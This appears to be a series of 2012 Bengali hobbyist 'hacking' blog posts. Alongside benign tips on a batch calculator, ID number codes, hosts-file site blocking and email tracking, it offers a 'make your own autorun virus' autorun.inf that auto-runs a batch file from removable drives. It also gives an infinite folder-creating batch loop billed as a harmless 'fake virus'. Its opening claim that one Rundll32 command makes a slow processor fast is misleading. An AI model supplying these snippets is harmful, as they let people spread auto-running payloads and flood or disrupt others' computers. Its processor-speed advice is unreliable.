Tuesday, June 26, 2012

দারুণ খবর!!! আপনার স্লো স্পীড এর প্রসেসর কে করে নিন হাই স্পীড, মাত্র 1 মিনিটে!

সবাইকে সালাম জানিয়ে শুরু করছি। আমরা যারা কম্পিউটার ব্যবহার করি তাদের অধিকাংশের কম্পিউটার এর প্রসেসর উচ্চ গতি সম্পন্ন তবে কিছু কিছু পিসি অনেক আগে কেনা হয়েছে, যার প্রসেসর খুব কম গতি সম্পন্ন কিন্তু বিভিন্ন কারণে সেটাকে বাদ দেয়া হচ্ছে না, বা বাদ দেয়া যাচ্ছে না। তাহলে এখন উপায় কি? অবশ্যই উপায় একটা আছে, যেটা করে আমার কিছুটা উপকার হয়েছে। জানি না আপনাদের কতটুকু উপকার হবে। তবে চেষ্টা করে দেখতে পারেন, এবং যদি আপনাদের উপকার হয় তাহলে অবশ্যই কমেন্টের মাধ্যমে জানাবেন। তাহলে আসুন এখন দেখি কিভাবে করবেনঃ

প্রথমে আপনার রান এ যান এবং সেখানে টাইপ করুনঃ Rundll32.exe advapi32.dll,ProcessIdleTasks


এবং এন্টার চাপুন। এখন যা করার দরকার আপনার পিসি নিজেই করে নিবে। আপনার কাজ হল শুধু একবার রিস্টার্ট করে নিবেন।

ধন্যবাদ সবাই কে।

Monday, June 25, 2012

নিজেই বানান autorun VIRUS

মোটামুটি সবাই autorun VIRUS এর সাথে পরিচিত। সাধারনত Pen Drive এ autorun VIRUS টি আমরা বেশীর দেখে থাকি। এখন থেকে এই autorun VIRUS টি বানাতে পারবেন আপনি নিজেই। একবারে সহজ একটি Code Notepad এ লিখলেই হয়ে যাবে।

১। Open Notepad
২। .নীচের Code টি type করুন।
[autorun]

Open=Pirus.bat

Shellexecute=Pirus.bat
৩। .এরপর autorun.inf নামে Save করুন।
ব্যাস তৈরি হয়ে গেলো autorun VIRUS।
দয়া করে এর মাধ্যমে কারো ক্ষতি করবেন না।

নিজে নিজেই Calculator বানান

Calculator এর প্রয়োজনীয়তা অস্বীকার করার মতো নয় কারণ একে সবারই প্রয়োজন। আমাদের Computer এ একটি Calculator দেওয়া থাকে যা দিয়ে আমরা আমাদের হিসাব নিকাশের কাজ করে থাকি। কিন্তু যদি নিজেই তৈরি করলেন একটি Calculator তবে কেমন হয়? হ্যাঁ Notepad এ কিছু কোড ব্যবহার করে নিজে নিজেই তৈরি করতে পারেন Calculator.

১। Open Notepad
২। .নীচের কোডটি Type করুন।
@echo off

color 4A

title MY CALCULATOR

:loop

cls

echo created by THE HACKERS

echo _

echo email: xman420@hackermail.com

echo web: sorryhacking.blogspot.com

echo.

echo My Calculator

echo -----------------------------------------------

echo * = MULTIPLY

echo + = ADD

echo - = SUBTRACT

echo 2 = SQUARED

echo / = DIVIDE

echo After an equation, type CLEAR to clear the screen of your equations, type KEEP to leave them there, or type EXIT to leave.

:noclear

set /p UDefine=

set /a UDefine=%UDefine%

echo.

echo =

echo.

echo %UDefine%

echo KEEP, CLEAR, OR EXIT?

set /p clearexitkeep=

if %clearexitkeep%==CLEAR goto loop

if %clearexitkeep%==KEEP echo. && goto noclear

if %clearexitkeep%==EXIT (exit)

:misspell

echo.

echo -----------------------------------------------

echo You misspelled your command. Please try again (make sure you are typing in all caps LIKE THIS).

echo Commands:

echo CLEAR Clear all previous equations and continue calculating.

echo KEEP Keep all previous equations and continue calculating.

echo EXIT Leave your calculating session

echo Enter in a command now.

set /p clearexitkeep=

if %clearexitkeep%==CLEAR goto loop

if %clearexitkeep%==EXIT (exit)

if %clearexitkeep%==KEEP goto noclear

goto misspell

৩। .এরপর Calculator.bat নামে Save করুন।
এবার Calculator নামে File টি Double Click করে Open করুন আর হিসাব-নিকাশের কাজ করুন।

Tuesday, June 19, 2012

“অতি-সহজেই জেনে নিন আপনার জাতীয় পরিচয়পত্রের নম্বরের গোপন সংকেত বা কোড”

বাংলাদেশী হিসাবে আমাদের অনেকেরই জাতীয় পরিচয় পত্র (National ID Card) আছে। অনেকে এটাকে ভোটার আইডি কার্ড হিসাবে বলেন যেটা সম্পুর্ণ ভুল। এটা ন্যাশনাল আইডি কার্ড বা জাতীয় পরিচয় পত্র।
আপনারা দেখবেন এটার নীচে লাল কালি দিয়ে লেখা ১৩ সংখ্যার একটা নম্বর আছে যাকে আমরা আইডি নম্বর হিসাবে জানি। কিন্তু এই ১৩ সংখ্যার মানে কি? আসলে আমরা অনেকেই এই সংকেত/কোডগুলো জানিনা। আবার অনেকের জানার আগ্রহ থাকলেও কোথাও হয়ত হেল্প পাইনি। যাইহোক এত চিন্তার কারন নাই। এবার উক্ত সমাধান নিয়েই আজকের পোস্ট। যারা জানেন না তারা নিজেই এবার চোখ বুলিয়ে নিন। আশা করি নিজে উপকৃত হবেন এবং অন্যকে জানানোর চেষ্টা করবেন।

১) এর প্রথম ২ সংখ্যা – জেলা কোড। ৬৪ জেলার আলাদা আলাদা কোড আছে। ঢাকার জন্য এই কোড ২৬।
২) পরবর্ত্তি ১ সংখ্যা – এটা আর এম ও (RMO) কোড।
সিটি কর্পোরেশনের জন্য – ৯
ক্যান্টনমেন্ট – ৫
পৌরসভা – ২
পল্লী এলাকা – ১
পৌরসভার বাইরে শহর এলাকা – ৩
অন্যান্য – ৪
৩) পরবর্ত্তি ২ সংখ্যা – এটা উপজেলা বা থানা কোড
৪) পরবর্ত্তি ২ সংখ্যা – এটা ইউনিয়ন (পল্লীর জন্য) বা ওয়ার্ড কোড (পৌরসভা বা সিটি কর্পোরেশনের জন্য)
৫) শেষ ৬ সংখ্যা – আই ডি কার্ড করার সময় আপনি যে ফর্ম পূরণ করেছিলেন এটা সেই ফর্ম নম্বর।
বর্তমানে আবার ১৭ ডিজিট ওয়ালা আইডি কার্ড দেয়া হচ্ছে যার প্রথম ৪ ডিজিট হচ্ছে জন্মসাল!
(তথ্যসূত্র- নির্বাচন কমিশন অফিস)

ফেইসবুক ও অন্যান্য সাইট ব্লক করে রাখুন (মিনি টিপস)

খুব সহজেই যেকোন সাইট ব্লক করে রাখতে পারবেন দুই মিনিটেই। চলুন কথা না বাড়িয়ে কাজ শুরু করে দেই;
>> প্রথমে Start মেনু থেকে Run অপশনে ক্লিক করুন।
>> এরপর নিচের লেখাটুকু কপি করে পেষ্ট করুন ;
notepad c:\windows\system32\drivers\etc\hosts
>> এবার OK তে ক্লিক করুন অথবা ইন্টার বাটন চাপুন।
এবার যে নোটপ্যাডটি ওপেন হবে সেখানে নিচের লেখাটি দেখতে পাবেন।
127.0.0.1     localhost 
> এবার এই একই লেখা কপি করে নিচের লাইনে পেষ্ট করুন।
এবং localhost  এর পরিবর্তে লিখে দিন www.facebook.com
127.0.01 localhost 
127.0.01 www.facebook.com

এবং সবশেষে সেইভ ( Ctrl+ S ) করে ক্লোজ করুন।
এবার ব্রাউজার রিষ্টার্ট অথবা রিলোড দিয়ে দেখুন ।
ধন্যবাদ সবাইকে ; নিজে জানুন অন্যকে জানান।

দুনিয়ার সবচেয়ে সহজ পদ্ধতিতে ইমেইল ট্রাকিং !!

প্রথমেই আপনি যে ব্রাওসারে এটি ইনিস্টল করতে চাইন , সেই ব্রাওসার থেকে www.rightinbox.com  লগঅন করুন !



উপরের মতো ছাবি আসলে install now এ ক্লিক করুন
এবার ইনিস্টল  করুন (২/৩সেকেন্ড সময় নিবো )

ব্রাওসারটি রিস্টার্ট করুনঃ

দ্বিতীয় ধাপঃ

Grant assess এ ক্লিক করুন ও নির্দেশনা ফলো করুন ,ইনিস্টল সিস্টেম খুবই ইজি !

চাহিদা অনুযায়ী আপগ্রেড করুনঃ

এবার আপনার চাহিদা অনুযায়ী আপগ্রেড করে নিতে পারেন , তবে আমি ফ্রি ইউজ করতেছি :)
এবার কম্পোজ মোইল এ ক্লিক করে জাদু দেখুন !! দুটি নতুন বাটন যুক্ত হয়েছে !!
আসলে এটি একটি মজার অপশন , আপনি ইচ্ছা করলে এটি ফ্রেন্ডদের বিশেষ দিয়ে wish করার কাজে লাগাতেও পারেন , আপনি অবশর সময় আপনার মেইলটি সেন্ড করে সিডুইল টাইম ফিক্সড করে দিলেন ,এবার ব্যস্ততার মধ্যে বা গুরুত্বপূর্ন কাজে বিশেষ দিনটি আর ওভাবে মনে রাখার ঝামেলা নেই !!!
[কোন সমস্যা হলো একধিকবার ব্রাওসার রিস্টার্স দিবেন ও মেইল এ সাইন আউট করে সাইন-ইন করবেন। ]
যে মেইলটি ট্রাকিং করতে চান , তা কম্পোজ করে উপরের Track বাটন টি মার্ক করে দিন,
মেইল চেক করার সাথে সাথে support@rightinbox.com থেকে একটি Email Tracking মেইল আসবে এতে কখন মেইল খুলেছে সেই সময় (টাইম জোনসহ),দেশের নাম, আইপি এবং লোকেশন (গুগল ম্যাপ) ইত্যাদি আসবে ।

কিছু কথাঃ

আছাড়াও এ্যাডভান্স  কিছু জানতে চাইলে উল্লেখিত আপটি টি পূর্নরাই ট্রাক করুন , আইপি ট্রাক করার জন্যে বিভিন্ট সাইট পাবেন , গুগুলে চার্স দিন খুবই সহজেই পেয়েজাবেন।।

একি VIRUS!!হাজার হাজার FOLDER.DON’T MISS IT.

আমি যেই TRICK টা শেখাবো।এটা দিয়ে আপণী হাজার হাজার FOLDER তৈরি কোড়টে পারবেন। আপণী প্রথমে NOTEPAD OPEN করুন। তার পর নিচের CODE টা দিন।
 @echo off

cd desktop

:folder

md %random%

goto :folder FILE
এ যান SAVE AS. এ যান।ALL FILES SELECT করুন আড়পোড় SAVE করুন nabil.bat। SAVE করা FILE টী OPEN করুন।আর মজা দেখুন। IT'S FAKE VIRUS..DO NOT WORRY..
THE HACKERS